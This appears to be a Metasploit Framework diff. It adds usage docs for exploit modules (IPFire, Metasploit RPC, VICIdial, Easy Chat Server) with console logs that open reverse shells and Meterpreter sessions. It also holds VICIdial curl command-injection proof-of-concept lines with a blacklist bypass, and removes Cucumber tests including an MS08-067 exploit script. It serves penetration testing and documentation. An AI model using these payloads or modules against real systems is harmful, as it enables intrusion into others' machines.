## Vulnerable Application
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
This module has been verified against:
1. 2.19 core 100
2. 2.19 core 110 (exploit-db, not metasploit module)
## Verification Steps
1. Install the firewall
2. Start msfconsole
3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
4. Do: ```set password admin``` or whatever it was set to at install
5. Do: ```set rhost 10.10.10.10```
6. Do: ```set payload cmd/unix/reverse_perl```
7. Do: ```set lhost 192.168.2.229```
8. Do: ```exploit```
9. You should get a shell.
## Options
**PASSWORD**
Password is set at install. May be blank, 'admin', or 'ipfire'.
## Scenarios
```
msf > use exploit/linux/http/ipfire_oinkcode_exec
msf exploit(ipfire_oinkcode_exec) > set password admin
password => admin
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
rhost => 192.168.2.201
msf exploit(ipfire_oinkcode_exec) > set verbose true
verbose => true
msf exploit(ipfire_oinkcode_exec) > check
[*] 192.168.2.201:444 The target appears to be vulnerable.
msf exploit(ipfire_oinkcode_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
id
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
whoami
nobody
```

View File

@ -0,0 +1,142 @@
## Description
This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface.
## Vulnerable Application
[Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.
To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.
This module has been tested successfully on:
* Metasploit 4.15 on Kali 1.0.6
* Metasploit 4.14 on Kali 2017.1
* Metasploit 4.14 on Windows 7 SP1
Source and Installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/multi/misc/msf_rpc_console`
3. Do: `set RHOST [IP]`
4. Do: `set RPORT [PORT]` (default: `55552`)
5. Do: `set USERNAME [USERNAME]` (default: `msf`)
6. Do: `set PASSWORD [PASSWORD]`
7. Do: `set LHOST [IP]`
8. Do: `run`
9. You should get a session
## Options
**Username**
The username for Metasploit RPC (default: `msf`).
**Password**
The password for the RPC user.
## Scenarios
### Ruby Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 0
msf exploit(msf_rpc_console) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #0
[*] 172.16.191.166:55552 - Sending payload...
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400
whoami
win-sgbsd5tqutq\user
```
### Windows CMD Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 1
msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf exploit(msf_rpc_console) > run
[*] Started reverse SSL handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #1
[*] 172.16.191.166:55552 - Sending payload...
[*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400
Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\metasploit>whoami
win-sgbsd5tqutq\user
```
### Unix CMD Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.215
rhost => 172.16.191.215
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 2
target => 2
msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(msf_rpc_console) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.215:55552 - Authenticated successfully
[*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
[*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
[*] 172.16.191.215:55552 - API version 1.0
[+] 172.16.191.215:55552 - Created console #0
[*] 172.16.191.215:55552 - Sending payload...
[*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400
id
uid=0(root) gid=0(root) groups=0(root)
```

View File

@ -0,0 +1,133 @@
## Description
This module exploits a vulnerability in VICIdial versions 2.9 RC1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default).
When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to `exec()`.
This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
## Vulnerable Application
VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well.
This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
Installers:
* [VICIdial 2.11 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download)
* [VICIdial 2.13 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.13rc1.zip/download)
Follow the [instructions to enabled password encryption](http://vicidial.org/docs/ENCRYPTED_PASSWORDS.txt).
## Technical Details
The `functions.php` file defines a function called `user_authorization`:
```php
function user_authorization($user,$pass,$user_option,$user_update)
```
This function is used throughout the application to validate user logon credentials supplied using HTTP basic authentication. If password encryption is enabled the user's password is passed to the `pass` argument of the `bp.pl` Perl script, without quotes, using PHP's `exec()` function:
```php
if ($SSpass_hash_enabled > 0)
{
if (file_exists("../agc/bp.pl"))
{$pass_hash = exec("../agc/bp.pl --pass=$pass");}
else
{$pass_hash = exec("../../agc/bp.pl --pass=$pass");}
```
A rudimentary blacklist is used to prevent command injection. The apostrophe `'`, quote `"`, semi-colon `;` and backslash `\` characters are removed from the user's username and password using `preg_replace`, like so:
```php
$user = preg_replace("/\'|\"|\\\\|;/","",$user);
$pass = preg_replace("/\'|\"|\\\\|;/","",$pass);
```
It is trivial to bypass the blacklist.
For example, backticks ``` ` ```, pipe `|` or ampersand `&` are sufficient to bypass the blacklist and execute arbitrary operating system commands.
For the purposes of exploitation, reaching the `user_authorization` function call with malicious input is hindered by additional input validation in use prior to the authentication check throughout the majority of the codebase:
```php
$PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_USER);
$PHP_AUTH_PW = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_PW);
```
However, in VICIdial version 2.11RC2, at least two files did not make use of the additional validation:
* help.php
* vicidial_sales_viewer.php
In VICIdial version 2.13RC1, at least one file did not make use of the additional validation:
* vicidial_sales_viewer.php
This vulnerability was patched in revision 2759.
## Proof of Concept
```bash
$ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" \
--user 'anyusername:anypassword& id>/tmp/pwned_by_sales_viewer #'
```
```bash
$ curl -isk "https://VICIdial.local/vicidial/help.php" \
--user 'anyusername:anypassword& id>/tmp/pwned_by_help #'
```
Note that `/tmp/pwned_by_help` and `/tmp/pwned_by_sales_viewer` files should contain the results of the `id` command.
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec`
3. Do: `set rhost [IP]`
4. Do: `run`
5. You should get a session
## Sample Output
```
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
[*] 172.16.191.150:80 The target appears to be vulnerable.
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[*] 172.16.191.150:80 Sending payload (505 bytes)
[+] 172.16.191.150:80 Payload sent successfully
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400
id
uid=48(apache) gid=48(apache) groups=48(apache)
```
## Sample Output (Verbose)
```
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true
verbose => true
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
[*] 172.16.191.150:80 Password encryption is supported, but may not be enabled.
[*] 172.16.191.150:80 The target appears to be vulnerable.
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[*] 172.16.191.150:80 Sending payload (505 bytes)
[+] 172.16.191.150:80 Payload sent successfully
[*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400
id
uid=48(apache) gid=48(apache) groups=48(apache)
```

View File

@ -0,0 +1,53 @@
## Description
This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.
This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application
## Vulnerable Application
[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.
This module has been tested successfully on
* Easy Chat Server 3.1 on Windows XP En SP3
Installers:
[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe)
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploits/windows/http/easychatserver_seh`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed
## Scenarios
```
marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
meterpreter > sysinfo
Computer : MM-8B040C5B05D9
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
msf exploit(easychatserver_seh) >
```

View File

@ -1,8 +1,8 @@
## Description ## Description
This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain. This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain.
This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application
## Vulnerable Application ## Vulnerable Application

View File

@ -154,7 +154,7 @@ Process 2076 created.
To pass an argument, use the ```-a``` flag: To pass an argument, use the ```-a``` flag:
``` ```
meterpreter > execute -f iexplore.exe -a http://metasploit.com meterpreter > execute -f iexplore.exe -a https://metasploit.com
Process 2016 created. Process 2016 created.
``` ```

View File

@ -1,4 +1,5 @@
## Creating A Testing Environment ## Creating A Testing Environment
To use this module you need an x86 executable type meterpreter on a x64 windows machine. To use this module you need an x86 executable type meterpreter on a x64 windows machine.
This module has been tested against: This module has been tested against:
@ -23,6 +24,7 @@ This module was not tested against, but may work against:
### Windows 10 x64 ### Windows 10 x64
```
msf exploit(handler) > run msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567 [*] Started reverse TCP handler on <MSF_IP>:4567
@ -71,3 +73,4 @@ This module was not tested against, but may work against:
Domain : WORKGROUP Domain : WORKGROUP
Logged On Users : 2 Logged On Users : 2
Meterpreter : x64/windows Meterpreter : x64/windows
```

View File

@ -1,111 +0,0 @@
Feature: Help command
Background:
Given I run `msfconsole --defer-module-loads -q -x help -x exit`
Scenario: The 'help' command's output
Then the output should contain:
"""
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
irb Drop into irb scripting mode
load Load a framework plugin
quit Exit the console
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
Module Commands
===============
Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
edit Edit the current module with the preferred editor
info Displays information about one or more modules
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Selects a module by name
Job Commands
============
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job
Resource Script Commands
========================
Command Description
------- -----------
makerc Save commands entered since start to a file
resource Run the commands stored in a file
Database Backend Commands
=========================
Command Description
------- -----------
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Credentials Backend Commands
============================
Command Description
------- -----------
creds List all credentials in the database
"""

View File

@ -1,48 +0,0 @@
@targets @db
Feature: MS08-067 netapi
Background:
Given a directory named "home"
And I cd to "home"
And a mocked home directory
Scenario: The MS08-067 should get a session with bind_tcp
Given I ready the windows targets
Given a file named "ms08-067-bind.rc" with:
"""
<ruby>
self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
payload_name = 'windows/meterpreter/bind_tcp'
exploited_hosts = []
failed_hosts = []
hosts.each do |host|
print_status("Trying MS08-067 against #{host['ipAddress']}")
mod = framework.exploits.create('windows/smb/ms08_067_netapi')
mod.datastore['PAYLOAD'] = payload_name
mod.datastore['RHOST'] = host['ipAddress']
m = mod.exploit_simple(
'LocalInput' => nil,
'LocalOutput' => nil,
'Payload' => payload_name,
'RunAsJob' => false
)
sleep(1)
if m
exploited_hosts << host['ipAddress']
else
failed_hosts << host['ipAddress']
end
end
print_status("Exploited hosts: #{exploited_hosts.inspect}")
print_status("Failed hosts: #{failed_hosts.inspect}")
self.run_single('sessions -K')
</ruby>
"""
When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
Then the 'Mdm::Host' table contains the expected targets

View File

@ -1,153 +0,0 @@
@boot
Feature: `msfconsole` `database.yml`
In order to connect to the database in `msfconsole`
As a user calling `msfconsole` from a terminal
I want to be able to set the path of the `database.yml` in one of 4 locations (in order of precedence):
1. An explicit argument to the `-y` flag to `msfconsole`
2. The MSF_DATABASE_CONFIG environment variable
3. The user's `~/.msf4/database.yml`
4. `config/database.yml` in the metasploit-framework checkout location.
Scenario: With all 4 locations, --yaml wins
Given a file named "command_line.yml" with:
"""
test:
adapter: postgresql
database: command_line_metasploit_framework_test
username: command_line_metasploit_framework_test
"""
And a file named "msf_database_config.yml" with:
"""
test:
adapter: postgresql
database: environment_metasploit_framework_test
username: environment_metasploit_framework_test
"""
And I set the environment variables to:
| variable | value |
| MSF_DATABASE_CONFIG | msf_database_config.yml |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And a directory named ".msf4"
And I cd to ".msf4"
And a file named "database.yml" with:
"""
test:
adapter: postgresql
database: user_metasploit_framework_test
username: user_metasploit_framework_test
"""
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit --yaml command_line.yml`
Then the output should contain "command_line_metasploit_framework_test"
Scenario: Without --yaml, MSF_DATABASE_CONFIG wins
Given a file named "msf_database_config.yml" with:
"""
test:
adapter: postgresql
database: environment_metasploit_framework_test
username: environment_metasploit_framework_test
"""
And I set the environment variables to:
| variable | value |
| MSF_DATABASE_CONFIG | msf_database_config.yml |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And a directory named ".msf4"
And I cd to ".msf4"
And a file named "database.yml" with:
"""
test:
adapter: postgresql
database: user_metasploit_framework_test
username: user_metasploit_framework_test
"""
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
Then the output should contain "environment_metasploit_framework_test"
Scenario: Without --yaml or MSF_DATABASE_CONFIG, ~/.msf4/database.yml wins
Given I unset the environment variables:
| variable |
| MSF_DATABASE_CONFIG |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And a directory named ".msf4"
And I cd to ".msf4"
And a file named "database.yml" with:
"""
test:
adapter: postgresql
database: user_metasploit_framework_test
username: user_metasploit_framework_test
"""
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
Then the output should contain "user_metasploit_framework_test"
Scenario: Without --yaml, MSF_DATABASE_CONFIG or ~/.msf4/database.yml, project "database.yml" wins
Given I unset the environment variables:
| variable |
| MSF_DATABASE_CONFIG |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
Then the output should contain "project_metasploit_framework_test"
Scenario: Without --yaml, MSF_DATABASE_CONFIG, ~/.msf4/database.yml, or project "database.yml", no database connection
Given I unset the environment variables:
| variable |
| MSF_DATABASE_CONFIG |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And I cd to "../.."
And the project "database.yml" does not exist
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
Then the output should not contain "command_line_metasploit_framework_test"
And the output should not contain "environment_metasploit_framework_test"
And the output should not contain "user_metasploit_framework_test"
And the output should not contain "project_metasploit_framework_test"
And the output should contain "[*] postgresql selected, no connection"
Scenario: Starting `msfconsole` with a valid database.yml
When I run `msfconsole -q --defer-module-loads --execute-command db_status --execute-command exit`
Then the output should contain "[*] postgresql connected to metasploit_framework_test"

View File

@ -1,20 +0,0 @@
Given /^I unset the environment variables:$/ do |table|
table.hashes.each do |row|
variable = row['variable'].to_s.upcase
# @todo add extension to Announcer
announcer.instance_eval do
if @options[:env]
print "$ unset #{variable}"
end
end
current_value = ENV.delete(variable)
# if original_env already has the key, then the true original was already recorded from a previous unset or set,
# so don't record the current value as it will cause ENV not to be restored after the Scenario.
unless original_env.key? variable
original_env[variable] = current_value
end
end
end

View File

@ -1,14 +0,0 @@
require 'metasploit/framework/database/cucumber'
Given /^the project "database.yml" does not exist$/ do
Metasploit::Framework::Database::Cucumber.backup_project_configurations
end
Given /^the project "database.yml" exists with:$/ do |file_content|
Metasploit::Framework::Database::Cucumber.backup_project_configurations
File.open(Metasploit::Framework::Database::Cucumber.project_configurations_path, 'wb') { |file| file.write(file_content) }
end
After do
Metasploit::Framework::Database::Cucumber.restore_project_configurations
end

View File

@ -1,26 +0,0 @@
#!/usr/bin/env ruby
case ARGV[0]
when 'size'
puts "30 134"
when '-a'
puts <<EOS
speed 38400 baud; 30 rows; 134 columns;
lflags: icanon isig iexten echo echoe echok echoke -echonl echoctl
-echoprt -altwerase -noflsh -tostop -flusho pendin -nokerninfo
-extproc
iflags: -istrip icrnl -inlcr -igncr ixon -ixoff ixany imaxbel iutf8
-ignbrk brkint -inpck -ignpar -parmrk
oflags: opost onlcr -oxtabs -onocr -onlret
cflags: cread cs8 -parenb -parodd hupcl -clocal -cstopb -crtscts -dsrflow
-dtrflow -mdmbuf
cchars: discard = ^O; dsusp = ^Y; eof = ^D; eol = <undef>;
eol2 = <undef>; erase = ^?; intr = ^C; kill = ^U; lnext = ^V;
min = 1; quit = ^\; reprint = ^R; start = ^Q; status = ^T;
stop = ^S; susp = ^Z; time = 0; werase = ^W;
EOS
when '-g'
puts "gfmt1:cflag=4b00:iflag=6b02:lflag=200005cf:oflag=3:discard=f:dsusp=19:eof=4:eol=ff:eol2=ff:erase=7f:intr=3:kill=15:lnext=16:min=1:quit=1c:reprint=12:start=11:status=14:stop=13:susp=1a:time=0:werase=17:ispeed=38400:ospeed=38400"
end
exit 0

View File

@ -1,34 +0,0 @@
# @note `require 'simplecov'` is not used here because all features currently use external `msfconsole` process, so only
# that child process needs to load 'simplecov'.
# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
# It is recommended to regenerate this file in the future when you upgrade to a
# newer version of cucumber-rails. Consider adding your own code to a new file
# instead of editing this one. Cucumber will automatically load all features/**/*.rb
# files.
require 'cucumber/rails'
require 'aruba/cucumber'
# Capybara defaults to XPath selectors rather than Webrat's default of CSS3. In
# order to ease the transition to Capybara we set the default here. If you'd
# prefer to use XPath just remove this line and adjust any selectors in your
# steps to use the XPath syntax.
Capybara.default_selector = :css
# By default, any exception happening in your Rails application will bubble up
# to Cucumber so that your scenario will fail. This is a different from how
# your application behaves in the production environment, where an error page will
# be rendered instead.
#
# Sometimes we want to override this default behaviour and allow Rails to rescue
# exceptions and display an error page (just like when the app is running in production).
# Typical scenarios where you want to do this is when you test your error pages.
# There are two ways to allow Rails to rescue exceptions:
#
# 1) Tag your scenario (or feature) with @allow-rescue
#
# 2) Set the value below to true. Beware that doing this globally is not
# recommended as it will mask a lot of errors for you!
#
ActionController::Base.allow_rescue = false

View File

@ -1,39 +0,0 @@
Before do
set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
set_env('RAILS_ENV', 'test')
@aruba_timeout_seconds = 8.minutes
end
Before('@db') do |scenario|
dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
ActiveRecord::Base.establish_connection(dbconfig["test"])
end
# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
# unless Bundler.settings.without.include?(:coverage)
# Before do |scenario|
# command_name = case scenario
# when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline
# "#{scenario.feature.title} #{scenario.name}"
# when Cucumber::Ast::OutlineTable::ExampleRow
# scenario_outline = scenario.scenario_outline
#
# "#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}"
# else
# raise TypeError, "Don't know how to extract command name from #{scenario.class}"
# end
#
# # Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead
# # of overwriting each other as 'Cucumber Features'
# set_env('SIMPLECOV_COMMAND_NAME', command_name)
#
# simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup')
# # set environment variable so child processes will merge their coverage data with parent process's coverage data.
# set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}")
# end
#
# Before('@db') do |scenario|
# dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
# ActiveRecord::Base.establish_connection(dbconfig["test"])
# end
# end

View File

@ -1,16 +0,0 @@
# @note this file is loaded in env.rb to setup simplecov using RUBYOPTs for child processes
simplecov_command_name = ENV['SIMPLECOV_COMMAND_NAME']
# will not be set if hook does not run because `bundle install --without coverage`
if simplecov_command_name
require 'simplecov'
require 'pathname'
root = Pathname(__FILE__).expand_path.parent.parent.parent
SimpleCov.command_name(simplecov_command_name)
SimpleCov.root(root)
load root.join('.simplecov')
end

View File

@ -1,11 +0,0 @@
require 'pathname'
support = Pathname.new(__FILE__).realpath.parent
paths = [
# adds support/bin at the front of the path so that the support/bin/stty script will be used to fake system stty
# output.
support.join('bin').to_path,
ENV['PATH']
]
ENV['PATH'] = paths.join(File::PATH_SEPARATOR)

View File

@ -1,7 +0,0 @@
windows:
-
hostname: wxpsp0
ip: 127.0.0.100
-
hostname: wxpsp2
ip: 127.0.0.101

View File

@ -1,36 +0,0 @@
require 'metasploit/framework/database'
module Metasploit::Framework::Database::Cucumber
def self.project_configurations_path
Rails.root.join('config', 'database.yml').to_path
end
def self.backup_project_configurations
if File.exist?(project_configurations_path)
# assume that the backup file is from a previously aborted run and it contains the real database.yml data, so
# just delete the fake database.yml and the After hook will restore the real database.yml from the backup location
if File.exist?(backup_project_configurations_path)
File.delete(project_configurations_path)
else
# project contains the real database.yml and there was no previous, aborted run.
File.rename(project_configurations_path, backup_project_configurations_path)
end
end
end
def self.backup_project_configurations_path
"#{project_configurations_path}.cucumber.bak"
end
def self.restore_project_configurations
if File.exist?(backup_project_configurations_path)
if File.exist?(project_configurations_path)
# Remove fake, leftover database.yml
File.delete(project_configurations_path)
end
File.rename(backup_project_configurations_path, project_configurations_path)
end
end
end

View File

@ -30,7 +30,7 @@ module Metasploit
end end
end end
VERSION = "4.15.1" VERSION = "4.15.4"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev' PRERELEASE = 'dev'
HASH = get_hash HASH = get_hash

View File

@ -4,7 +4,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
## ##

View File

@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'osx'
self.base_arch = ARCH_X64
end
end
end
end

View File

@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'osx'
self.base_arch = ARCH_X86
end
end
end
end

View File

@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
## ##
module Msf module Msf

View File

@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
## ##
module Msf module Msf

View File

@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
## ##
module Msf module Msf

View File

@ -2,7 +2,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
require 'net/https' require 'net/https'
require 'net/http' require 'net/http'

View File

@ -2,7 +2,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
